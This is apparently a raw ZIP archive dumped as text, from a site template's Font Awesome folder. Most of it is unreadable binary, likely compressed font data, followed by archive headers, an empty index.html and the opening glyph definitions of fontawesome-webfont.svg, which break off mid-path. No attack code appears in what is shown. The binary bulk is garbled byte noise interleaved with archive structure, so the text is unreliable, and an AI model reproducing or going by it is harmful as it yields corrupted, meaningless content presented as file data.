`���I��;�B��������VUaft��e�������	�0)/p�������!cU����JƧ7ŀ=d���!]�3iu�+*4ƀ��3��s$\�(��R�g��E��������m�p���X7��y���LC�ZQgin^�Rvzi{U{|*����͖:�:�+�w�iEHaW�q9�U���u�O�Q�Q����=>���mLi��\�@���W�icU��u���`��̶��V^eL���?�U��IT�ch|58��rTVRmS�TQ�+Ř�~��cՎ%p����������"�覫!V��S�`D/��\d������߄[�Vy!��UE��d…�[�[F�ص�¨�A�C��V<4����m,�i���)C;�w��f��\�N����r������+�K\ �֊�lm��N�����}W͠�޸��0Ӯr��a�#2u��SǼT���!z�؊�?����n���+�k�s��~�����W�V���_��W�w>ҁɅRS���I?�;�|Tɢqj5"#kU+�+A�14�r�F�t�y+IN�y�����0�MYcX����p���dW>��q++Zb�m�bilˊ]m`A�Z^�L���ޒ�|X�b"ku�~p�t8Bf�x>[�&�cf��0{
����]�����3�̟y~&�H�3P���|m][`7T�GY�rfn��,������k��f�x�/oK�_���
��*{���t����@�����2��#g��=��/���{��Lg�5S?�(�lK?òc��!_0��3�	�γ%��
�
�ɰRO׎��-S������m�r��;�<����ɪ)��1X��ɫ��l�̊%�"a ���	ΘG՞��v'b�X����Z���ȝ�܉�������l� fm�"&�}GPX9{ΰ&ߐ�R��asfW��1�^|���q�4���t��؍�Dӻ'w��'�wTRE�dj���i����}�GU7�c.�.}�!.zs�Em��j��1��ݐ=�0Z�,S��qK�+��J,q����&ʹ�V�
�)A{���0�7�Ы.B�,=�1yd�q޼��΅mIƣ�*�?����	2�|��*�0����V�B'G!�$�h�B��Va{�(�H���e��Rz�q�#.O��b��{�o�2E�+�RGqaaa����l��ZR�J���-[~����[�ٗ��V�-T��l"���C"�,zw0�gѬJƩ7+�f������g<�Džo�����*p��RG�oҟ&���%c^�~[�$��[⑩.wػ�<�G�wą�u	���a���D�Z.n��&E�uF���C~����L_��3��ϐ��v�5䙾��/�\�!���̫zB��kh�y�8!�� ��G��JR�^ό�*�_���4>��S�k6�A��\��6��n�Lz��#��UC�ر-�Ww���a
�HI�I?�� ���2P���j�&����%v�sh1[M	ћ��r����%݈$wH���d��~A���7�ś? Wa�º�G~�*|�M���^��nY�R���o^�zz�j=��#[ۀC^�W��b�H�Ro�0�
sd�y46~ZC��7�{�Ɨ�����sݳǟ�n�8d]�I��U��֝{6N���Jgnys�]���7��,�m�9�F7��	���|s�湟3�i/�峹7���fe6ʏ�z��&1>�+a��K;��i�
c*��k�پ�m۞Ρѕ���s��0���HzBτ	=�gW��V�OR>���#9��~��Vs#�y��nIUM�R��<��}H$���ո��6����K��.^�P�����}M�̓�X�O__,��!�0�r��I���]��^�H@���L�d���\LӤ����)5mb<��O��J����D�F:ya�������/,%�׿���v�#�!�oS���� 
؋��Kn�biBq}���c�׈丣���&�v龖�V�^p���%�Bڹ�L�YL��LH|��F��N�
��F�	;9d��3Y�	o�#A����b玲I$^9J ^�o����Z*E_�|D$�_��k56�����2�Ʃ��Lmȟ�x����m��n_�ɱ;'�.6���~�ģJ�%�E�g�/�E5�E.Ì��sn��8ڗv	�t���Dx�r������礟/j��;�QR�nʋ$�;��O�6�^G ��Ez��Y���g��&��UuB�����W����Y{o���3A����c5�Y�Y"q�.��SF�/��Meg�H����4��N�^��3��\�m:���������.��z��69lP�P�i}���Vi�D����Ty��7`�k�(�\fs9�H�&Rv�Pi�*��@�h^߼N�5�kpW�V>IV-��ZP+�B�3�5p�%��oN�����ਟ�q��o��D�
6q�+���uVh�Y�ᔅ��ё�BVӊ���*��b�K��h�.8���̲�6���_�^�d�dy�ԠԘ]B"ђ)��,��i��37�ܿM:�_�i��~�X�@����,�-�Ѭ��,}�pa���<2����8����<�|{����ޝʰ��~�Ő�;,j^-�@��d.��=���4�cj��
u
V%]��8���})��Ϸ���$'*��K��	�X1��l8HH̛J����41��E!gy��,�U=U�=M5账��z�GV��!�=G�?l�^3�B_n�evM����IY�dkۖg����5�:�ñl�fp�l\Cl���;�>��m���J������_����$�\������?�7��wj=zŊ�q�
}Lx�	{�o�FQ�.j.��ZM]Im�n�vQ{e���W`�el�|cΑJJ�b�L�sI���R���0)���-����
�;U��M*��C�*.T��]��<���
�z��]ʗu��@V��ޗSޕ5����3J'�Grd�)��,���ꁪaWw�iְ]�"Fs�-aאb�J:D�r�1I���'.J	]��-[�|����:�j�6"y�F�vju/��c�Y��x��|�P�/���A�ޡ\(��.�]V��H���!��O6q���r�����q�Gv�X?$K
���q3̘�&����丣߹|d:dnI&�.���B�Zz�b@�&�[1�㹞��~�_��OG�>����բ��h��^��Q�|��w4]���`��]��w`増�s��^toǿL��ψu)VB�l�N��u�x$�V��6����}y�q�c�<$^�G�VM�)$��U�e_y�[��ń�$�`xK)J�_Sn@�6z�D霘�1���-��=F]` P�{����7�>0����!Mz�m��)��?�������7?�y����i
��XyUUê�Vl9�U5Q�y,4(�/��5\}�?o�&,{w�)3�]:�~@}.m�@k��&�^I��'%���ŏ�q���i�%O�(5L��A١���z�j�q� ~������q
U�@�J��X����g[��_�RE�J�rb����r�ֿ�|��v���� �e4L�E�Cލ��f?��_^r9�-R��7~��'�rfna����@S4�S`�@4z��9���Me�`(x$������[vrQ���
�p������
AW�_v����.L��1@!��Cd/;)̡�X��?x��{;T��?V�v�a�vՠ8������m�rqF�ߦt����>��_�A��?���P5(~N{�'\:o_\z���ʬ�c<�%�}[��J�5��<<���_����yR6$��k�j�~F���Lt���ɦq�N���DrÄ{��� ����x!E��:��0���r ��D�8���ҡ��hWaY[�p���q.�p�Qr�Fv:
�:&!=Q�Ί�PXǠ&e":�آ}0���hԺ�A����
oU�{��6���:��+D�޷3�2-m�y���,ͿH[�>�`�P�P���tQ�Z8�f�����	:g�AQ�V�*)�Bȃ��&���1�^o)*���k�V�y,Z��/X��V˸E���J?m��N+���g�jGl����ч|}���kC_��s&`4��l�-�B!�W;�ZmH��5��ƿ�+qJ�(�l�9��@gQY�9O2�]:�jXڠUPRb��Ty�q[T|�,1�%�g2�WZ�B�����bh����u�aI,�{b�A�1٪D�P놜�z�|$X>�t��B�����wʞ�N���j�a��Nn��6~,
��Kڠ��uX�h�}y=HЂ�h$�����A�T��g��wLa엪�͏�1a�x�r�
�J���t�<��&5Q���)`���6/4M��%���go��oj,
Z
cM��Z���p���Lh�֩gGdW��a����75Ł"�֨VFm���:jYh�ڴ�i��6�͛�q4e�Mݰn�1�Bt\�T1U�x�;$��1��H�kh�b�Ą�Џ��H�����1�S�[.�s���Kګ�d:�I����J����,
�~�~=8�p�Ӭٻ�ddx��
&�%b�(�Ns�
�ZF�sE=����X�x�-9��FTx
ʡ�6��u���sJ�n����Ԭ�xO*��(��^��F��fа4JH�۷���}wI�@-m��R�硢��'��,����(1&^�D
+1��/������������J_�i�^F"�����5<�M�ҍ�œ�KѾ���0�5J�@��c�����"f
�j�W.Z�1�mҴ�m^�d�����
oJ��)�m�[_s��E
��}�/�of��+�~��`P��]�q)��H����׾x�Ego��륾ᝁ F�i���� <���]4d+�>�P0�c#ۜ�z�w/��]�=�s@+ܳ�<4���-���#�H�w�4�f�EEi�xk��!���+T�-
m5�_Vq��&[�A)�f�����ӆ�5��,�(���>�,_mW�`
Ђ���v��9t�͛�Eo�s84*O��{����l�ӧo�	��LjF�/x^ý����^��&�S�P8��>��A&���::�ف V�7C3�!D6d���!X�|y:E��_%7���gk]�&Tm�c��VO�#P_�3k�*�"��_�/�o>|�����������1�r�'���X>�ҧ�/��%�H���yӳ�>����Z�j4һ�T@h��n�u����/~�L�y�C�a��aU�4�Wi���@~�d���y��G������Z�qi�$ݥ9p�C�@����&�sr��<>K1�ѿK�;J����D���,~�t���&�<��g��OvL���;^��I�C��J=��^FmB}d�C�,~�P�xG�2�?���XVD~��h"^�?�]n(5����2?�(8w�L�3�1��[H����E��l�7�?���+�G(���6}�[0�)��ư4
�A�k߄b�؝��k�Ŋ��uX��U�#�)V����7Ń��D��e��t�[���ٙ�>�@����84�� �-9����Z�.n}:���Ε�z���#��dh�!��
ǥ����k�O[�:���!�]Y�)�
�t��dO��r�����rv��P2�+�2�*T���EڄUj�PB�wK�Θ
=�����|�Ǥ<��3��n魠*ڿ�fMh�s�X>W�gO����N'$�u7��tAұ�A�����q��h�͌̇��D0��'�*��&4�0<BXFF�V�}�o�q|���߻�Gg�^��ä�kש�G������NrJ��w��s`Ϗ���U�L��:��J���^��	��c�k@�� }ߓ��M�$�?��t�^"�Y���S�N[yļ�+��]p}�L���FY>�HCA���qp��y��M?�x��	MzA���
�>Dm�7�r)y��蒾V�͍������l�1ύ�"wm�_\s	�ɬ�?�=OM�fR��5�U�C��ԫ�{�G�����eHa[�y����
�=sD� R�U�W%Rd1�'�=�uR�(/_� �9�ַܺI��
�"�%����;�0��ݎ����b�+M���G`�p�\�{��?sX΁R�K����V7��M3��y��>��
��s���h�)wd���c���yt�\��̌m��7�x���5~ng��l4mp‰�Ѩ�!k	ԣI�dBG�4CB�s�5C�OYb�jo��۰8=vMa�.��/l�n�����M�q�f���J��,�i��a��s2�`0:�{�Y�),fs~v�A�t��T��1��2?�+E1�V��h���cO=��B@����U�
X��y$c9��h���
����h�ׂU
��ׇL_�CAkHq�>�������yJ-��-?��I'��<��TJ#�2v��$d��1��h0�Y!}=��n�b�J0�d��N݊�T�l_9V9��Jk����m���{\n.ӡ�&GTA�B0��f�s�f�X
|,c�:��k;�u>Cv����F�ގ�sZL��W�T�x�c`d```a<=�|Ed<��Wnv�b|�F�������
��``b�d#�x�c`d``c������8�"Ȁi+{
�x��VKkA�y�<��,�5VIL�,���E����"�E"�'sj�����J��U3U=ߴ��K>�����Փ��g�_��(�ET��u���=O�'{?<c|u�>�Law��]+t�w���^��nD.�}k�zՇ��쯍U}ɩ�o9�:�΋���;��FШ����O��;��XS�B�[x���e#2U�o�ا�C��������??✼	9�Xz{w�>�	O3��E��*��De�[�=픖wE�:s�e�I5o�ÞR݇�G����=SB�P�s�|W�+�Ⱥ�	��}[0��l�]�1V����~�ٴ�F�o���M���r�����;�'�����O^gL���y�h�o����l7��/���ӌr�q3}=vC����C��HF=�ǡv���@�i�lr�.�r�4�C���үV����ldV¬�L�[�e��N���0WԿ�o�ϓ�iosW�wz:�z���Q��Y��Y��3���R�y��K �>?��+#�B����|�J���zj�����6�]@�UD-�P�v�>n໌u�;���W����O���MeFY�г���\�l@���*�!����u?�'�m������
�'�18��>�w��C�Ú\f�M��c}��~5���l���mo,.�}��Y��r�[�K����f\�y���B�G�y���o����C[�����
����|�E�E@
����\}�d<�z��/�
|�x���{T�g����N.��i�B�d�b!���3�i�M��e�$׹4��M�=�'4r���i�!�e������������}Nҿ�1��H6dH��A�T8T*�
�H�GJ%��K�^�
������2	RY����HY��Ryr*УB�Tq"(�*ѯ��T���D�S�Tu�T-�I����z
�jp�E/�N��:�R]ɕW����gKn�l7w��S�G�G�{�o�x���D��J�=é	=���Ż7����,5�w�0@N386C�����&�9^5��;�J-�H~�i	>��j�^+z���O��P�u/�/��w�R+�����=q� �v@G�S�LLgr���<��IR�B��]�<�1���ug���fO|�E���_�P;�ap�K\?��G�������ǁ�\���Ti5��s܇�}8�A�p	�O�?������Ͽ���R� �Kr�Q'�s�?�YO�w���1��IN���0��EQ
�S�9�?�'���0��i�O��do91�1��ٜ�X�Ų�X�b9�s�?��84�Q+����q>�_��:K�ຈ��L����zK�[�w˘Y<����r4/G�
f��+��*�$p�V�{"��r
�kr���Z��u�1	nI��x���c�7�l��Fzmd���f��L�-�ڂ[9�[�L�6�i{�[�G
�w�o:wSo3܇��j?�R镊���:�g&
>��u�:��s�GXK�˟���Qt�����8�;��<O��$�'�|
ON������2�Ltg��k��uo����\�G���|�؋輄���]書竬_×�h�ιȆ�
�o2�[�ݢw� ��q���L�g��<D�#r�=��'�|J~>��S�g�9�^г�o��/��/�
ͯX{]\Fe�l�)�H�X�L��eJ�dJ9�8+eJ{Ȕ�*.-��o�x���2|@6�t�L%7@l�^�@���(��ce�E�T�q>%S��IN-��bυ����!�.�ꎔqeϕ��ʸ�ȸ�xP�!�Fލ��4�I2^	2ެ7%���w�i$��<���_�L+8�;�гu�L�X�-��@��2A<;���@c'8��3�tAC�.3���=P&��p�(ۓ��1�����o���������O��)2�	ye�e0ڇd�eN��d��gF�{u�B��p��o����q�D��>�*3��	�s3������=��6��(���T~G�7�����7��L4���Y�C�ٜ�9��񜋮��z���]�����%�q	���ϖ1�T���e�W�e}�(�=��dr��w���s�oWs�e
\����迎�$�H�}nEc2�pϘ��o�����K�S
}w�o����Z{�/��o?9��w*z�� ��%
އ�a�a/�G�|���<�lO0��!�������r���Q&�<�/P3\�w��D��p����ˆ�
�n��܂�-��?�3u�>w�y��wᘋ��ɀ��u}�є��<��m�󐼇����O�~�p���)>���k�y�g���{ü�,��Ǜ��u���β�<d�-rJ�X�l	�K���l�<ٲN��Xs̖��'[��J���lOY'٪��բe���&ٚ� ]�%R�6��$ʺ˾C|� �ĺ=�m0C֝5�,�w�d=x6�V�\YO�(J��?(�m�,�!��~Sr��������~n S�%�Z�@6m�e�ю��p@~����e��tx�c`d``:�$ɠ�L@��`>(Mx����jAƿݤMk�`�R��AD��ݴ��7�?�Mhb�W�6;I�&�av��k_@��+@���U�o'c�BMH�7g�����<�������d�E	�,p?-QvZ^��S��J��r	/�g��p�}oyw�/��x���G��Y��:w�LƜl�e��>[.�1�[.b�q-��	u�y��זK�輵��mwfy����x�~������b�b�Ї��1BL I���vQ����K^��I��k��&���LŽ���D��0�fb����`0�(JfRMdD��I/��DK1�Z��`*�t�M��Ƭ d.�do<U��ڨ�U�ڴ��Mr�;�g�zpXm�k'�F�}���FUF��]�=j;௲��K��i"���bD�.x�B$�d��y�&��_j����Q�>��º\ՒO���-�9"Z��mW���j��\DI�滎��Sid�IΩ+�Щ�})��dG�»�2']�Z����J�Z��rl�$��;2��V���z���n�M�"�L4�R�+�_�
���e�k=��~^^8����D�9�yW�y�1�E&���ϋ�x�}Wt�ȲuU�b'X��̔ؖ�,O`����ݶ5�-� 0����̏��1�}�̰�����L�s~N�$ݾ�}oW))L��?����nJ]��.uc�ԭ�R��n�4d 9����0����
X	�ư	l
���l	[�ְ
�	���`{�v��`g�v��`w����`o���1����P�	���`8���`8V�L��¡pG��p
��p'��p����p�g��p�
�P��zj4�Fj�-hClX
]p�}p��5�C!D0���·�B�.�K�R�.�+�J�
��k�Z����F�	n�[�V�
n�;�N��{�^���Ax�G�Qx�'�Ix
��g�Yx���Ex	^�W�Ux3��
o���;��.x7������!�0��������	�$|
>
���������"�_�/�W��5�:|�	߂o�w��=�>�~?��O��3�9�~	��_�o���~�?Ÿ����+�
���¿����/��0��b�pX�a�Q\��q�čpc�7��ps��ĭpk�߄��v�=�;�N�3�n�;�{�^�7���c	�XAM��N�~�?��Ax0��p
�qg�P<�#�H<
��c�X<���D<)�:����x��g�x����X����:6��
[��ڸ��`�袇k��C�p�qq-���x^���x^�W�x^���x^�7�xތ��xގw�xލ��xޏ�>���>�O�>���>�/�����f|�߆o�w�;�]�n|�߇����C�a|
?�ŏ����I�~?��������E|��_Ư�W�k�u�~������w�{�}���?Ɵ�O�g�s�������o�
�����?��/�W��������?�_JQ�2���i�
T�a�QZF�i���hcڄ6��hsڂ���hkچ�D��v�=�@;�N�3�B��n�;�A{�^�7�C���S��T!�L��M�~�?@�At0B�h��i�f�P:��#�H:���c�X:����D:�N�S�T:�N�3�L:�Φs�\��ydQ��$E-jS�lZM]r�G}rɣ5�S@!E4G�@���Χ�B��.�K�R��.�+�J����k�Z�����F��n�[�V��n�;�N���{�^����Az��G�Qz��'�Iz���g�Yz����Ez�^�W�����cA�v#(�ot�?��S���tZ~A���y�b:
��n�N/vj������� D���UϝS���۫�|\�QHn��
�v�r��3�o�t��<Ϧj��C��Ҿk5���|����l�I���uw��9�b�a�
G1���0竖��N^�O踍n��X�o��uܾ

s��T��S�M!���ˮ�nS��V\Sh������Kѳ�n���~�mX=�[������ڡ�؍b��ZG��NX���v3��Y�_sT+N�
��_L:��>��WGAh�Ӳ���o�{	N��wG[VCɩ���rs��#_e=�o�N�gy5Y��VS&��u��f���L����D�� T^�n5���iY|��^~�Hˡg<�M��p�\�e|8~}Љgҝ�Z��0��n��A'��DAM�Q��}�,&&��9��#k"�G�8�
�������T?�ሆ%�b`�*ԭ��i��;���4�U�v���#�#�r{���"���g9�r��p���nY��b�)��w�Wy��Fc5���p�@
���~;~=���W���~���o��\��X�l�j�UX�W�;GY�=�W*�{�L��;�b*?!+�,a�^���C�W�~��l_�b���$��C�er�b2�}�N_crߥ�ZL�m�z�H؉z���*�L�d���I�rZ�8�$1%'�r�q�~�͙e΋�ok�o��9l��qB�~�ɽ�b�m3C=�A�&��p�c�'D��˛t�	��p~��l2s6�K)����7��4�R����r�bC����B�e��\܊�dDdE���zG��`$�`�C��!H����Uv��;�ɄV�
�Qy3Cu�V����87�'���F^Z�2���ٺ�8BP#
YJ�O��b��^:��TAΧVg�v�q��~��A����]vx�vg(����PwT��k78�G�������;�����y7�b@q�@�5T�>s�;�'M��I#��I3>+�7�A:p}��=�[|y�-N*��y�.��orJ���qQ�Y�X;�(�C�k�8����>koqD�Wpd5�E=�q�un���k�6�t��$��z�"cÎ��|١(�S	c���J)�0.Geɔq:�-�#�����$�Y=f��
��f��-Y��V�t�y�����XK�h�Q]�ԗ����H�
���e_����`~�(�5�TA��Fֱ<�b���=�.��o�w�š�
��I3љw���f�w3���ł|0˗��8-	��/�Ona�.�%�e�/$��է�����<���0�"/���h܈C����3��e9i�b�į9���;�8�$�"���G�!�H��J�aW�k��dqIf)�H���Ƕ��I�_�({�ڵrv�j(N�2���f-�����i�M����j�&�Pd>Q����ij�hr���&|���`D��C�����	{��nA9���YH��61G&Ύ��m/��%	iź�A�J��c��O��� �wt��C�����ŗ^l�4b�&��ψ8��W�V/��g��|�%�%Y����]%�Ԯ{M��>��ɏ���6�3Y
�����8Tcx��7�V.M�\7r8�G�
6��C����p�WlЋcS�\�Ha/r6��z#��^`����ޑ��5�,�Q�!����������^��ߴ]��&����h�����#���*Z�L�>K�,�G�ҧ��K�����\w>��5�]���-�2�䖠��qRs#?X�b�9�Vq�-ˎJK!	<�=
"��4s�ύ=���q���Wv�����/TK���k���Xe�dI���$9G��M7\�@�&��S��J�5����H��⁚+C%)�R�V��U)&���E}���Uc|��8�L
h�,]M
hR@����d�V�ui��(KQIf���)EU�	)4>&�<и��+RRb\��k�ӵ�J�+	�$���J�+	�$��0���,�� ʂ(����	g�u�!в��1tm�Z&��a�kEX+��V4tV�
!6dZC@��2dȐ���0a
����zh�L@f�ϻ?PUTTPUT��*4US^nHKh���Ą ��EE|Q_T��EE|Q�Ĥ &!��L
b��n�b�܊BLa�)���$EY����U)&����)��K2�!�0��X�Kb	C,a�IIHJ�3bC�`�1�!f0����3bC�`�	_FYeA�!0ʂ��"�� DzC�7DzC�7DzC�7*�0!���!���!���!���!���!���!�� LA��)S,z��.��sK"�!�UAT!�"�!�"�!�"�!�"�!�"�!�"�!�"�!�"�1)��DC"����JU۴41�kƙ"�)қ:�&]�2X�bB
�3�K��o����o����o����o����o����o����o����o����o��f)���Uz���u]�uY�z���RW����zB׃�V�zJ�Ӻ��lROi�)�;�y�4��ҼS�wJ�Ni�)�;�y�4��ҼS�W�Ҵ�ּӚwZ�Nk�i�;�y�5��ּӚwZ�Nk�iͫckI��Ҍ�Ѽ3�WGؒ����;�yg4��Ѽ3�wF��h�Y�;�yg5��ռ��wV�ΊS&5�&�դ��tV��j����	�PKԜ�\�#o,,.purity_iii/fonts/font-awesome/fonts/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PKԜ�\��;_����;purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg>
<metadata>
Created by FontForge 20120731 at Mon Oct 24 17:37:40 2016
 By ,,,
Copyright Dave Gandy 2016. All rights reserved.
</metadata>
<defs>
<font id="FontAwesome" horiz-adv-x="1536" >
  <font-face 
    font-family="FontAwesome"
    font-weight="400"
    font-stretch="normal"
    units-per-em="1792"
    panose-1="0 0 0 0 0 0 0 0 0 0"
    ascent="1536"
    descent="-256"
    bbox="-1.02083 -256.962 2304.6 1537.02"
    underline-thickness="0"
    underline-position="0"
    unicode-range="U+0020-F500"
  />
<missing-glyph horiz-adv-x="896" 
d="M224 112h448v1312h-448v-1312zM112 0v1536h672v-1536h-672z" />
    <glyph glyph-name=".notdef" horiz-adv-x="896" 
d="M224 112h448v1312h-448v-1312zM112 0v1536h672v-1536h-672z" />
    <glyph glyph-name=".null" horiz-adv-x="0" 
 />
    <glyph glyph-name="nonmarkingreturn" horiz-adv-x="597" 
 />
    <glyph glyph-name="space" unicode=" " horiz-adv-x="448" 
 />
    <glyph glyph-name="dieresis" unicode="&#xa8;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="copyright" unicode="&#xa9;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="registered" unicode="&#xae;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="acute" unicode="&#xb4;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="AE" unicode="&#xc6;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="Oslash" unicode="&#xd8;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="trademark" unicode="&#x2122;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="infinity" unicode="&#x221e;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="notequal" unicode="&#x2260;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="glass" unicode="&#xf000;" horiz-adv-x="1792" 
d="M1699 1350q0 -35 -43 -78l-632 -632v-768h320q26 0 45 -19t19 -45t-19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45t45 19h320v768l-632 632q-43 43 -43 78q0 23 18 36.5t38 17.5t43 4h1408q23 0 43 -4t38 -17.5t18 -36.5z" />
    <glyph glyph-name="music" unicode="&#xf001;" 
d="M1536 1312v-1120q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v537l-768 -237v-709q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89
t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v967q0 31 19 56.5t49 35.5l832 256q12 4 28 4q40 0 68 -28t28 -68z" />
    <glyph glyph-name="search" unicode="&#xf002;" horiz-adv-x="1664" 
d="M1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -52 -38 -90t-90 -38q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5
t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
    <glyph glyph-name="envelope" unicode="&#xf003;" horiz-adv-x="1792" 
d="M1664 32v768q-32 -36 -69 -66q-268 -206 -426 -338q-51 -43 -83 -67t-86.5 -48.5t-102.5 -24.5h-1h-1q-48 0 -102.5 24.5t-86.5 48.5t-83 67q-158 132 -426 338q-37 30 -69 66v-768q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1664 1083v11v13.5t-0.5 13
t-3 12.5t-5.5 9t-9 7.5t-14 2.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5q0 -168 147 -284q193 -152 401 -317q6 -5 35 -29.5t46 -37.5t44.5 -31.5t50.5 -27.5t43 -9h1h1q20 0 43 9t50.5 27.5t44.5 31.5t46 37.5t35 29.5q208 165 401 317q54 43 100.5 115.5t46.5 131.5z
M1792 1120v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
    <glyph glyph-name="heart" unicode="&#xf004;" horiz-adv-x="1792" 
d="M896 -128q-26 0 -44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5q224 0 351 -124t127 -344q0 -221 -229 -450l-623 -600
q-18 -18 -44 -18z" />
    <glyph glyph-name="star" unicode="&#xf005;" horiz-adv-x="1664" 
d="M1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -21 -10.5 -35.5t-30.5 -14.5q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455
l502 -73q56 -9 56 -46z" />
    <glyph glyph-name="star_empty" unicode="&#xf006;" horiz-adv-x="1664" 
d="M1137 532l306 297l-422 62l-189 382l-189 -382l-422 -62l306 -297l-73 -421l378 199l377 -199zM1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -50 -41 -50q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500
l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455l502 -73q56 -9 56 -46z" />
    <glyph glyph-name="user" unicode="&#xf007;" horiz-adv-x="1280" 
d="M1280 137q0 -109 -62.5 -187t-150.5 -78h-854q-88 0 -150.5 78t-62.5 187q0 85 8.5 160.5t31.5 152t58.5 131t94 89t134.5 34.5q131 -128 313 -128t313 128q76 0 134.5 -34.5t94 -89t58.5 -131t31.5 -152t8.5 -160.5zM1024 1024q0 -159 -112.5 -271.5t-271.5 -112.5
t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5z" />
    <glyph glyph-name="film" unicode="&#xf008;" horiz-adv-x="1920" 
d="M384 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 320v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 704v128q0 26 -19 45t-45 19h-128
q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 -64v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM384 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45
t45 -19h128q26 0 45 19t19 45zM1792 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 704v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1792 320v128
q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 704v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19
t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1920 1248v-1344q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1344q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
    <glyph glyph-name="th_large" unicode="&#xf009;" horiz-adv-x="1664" 
d="M768 512v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM768 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 512v-384q0 -52 -38 -90t-90 -38
h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
    <glyph glyph-name="th" unicode="&#xf00a;" horiz-adv-x="1792" 
d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 288v-192q0 -40 -28 -68t-68 -28h-320
q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28
h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192
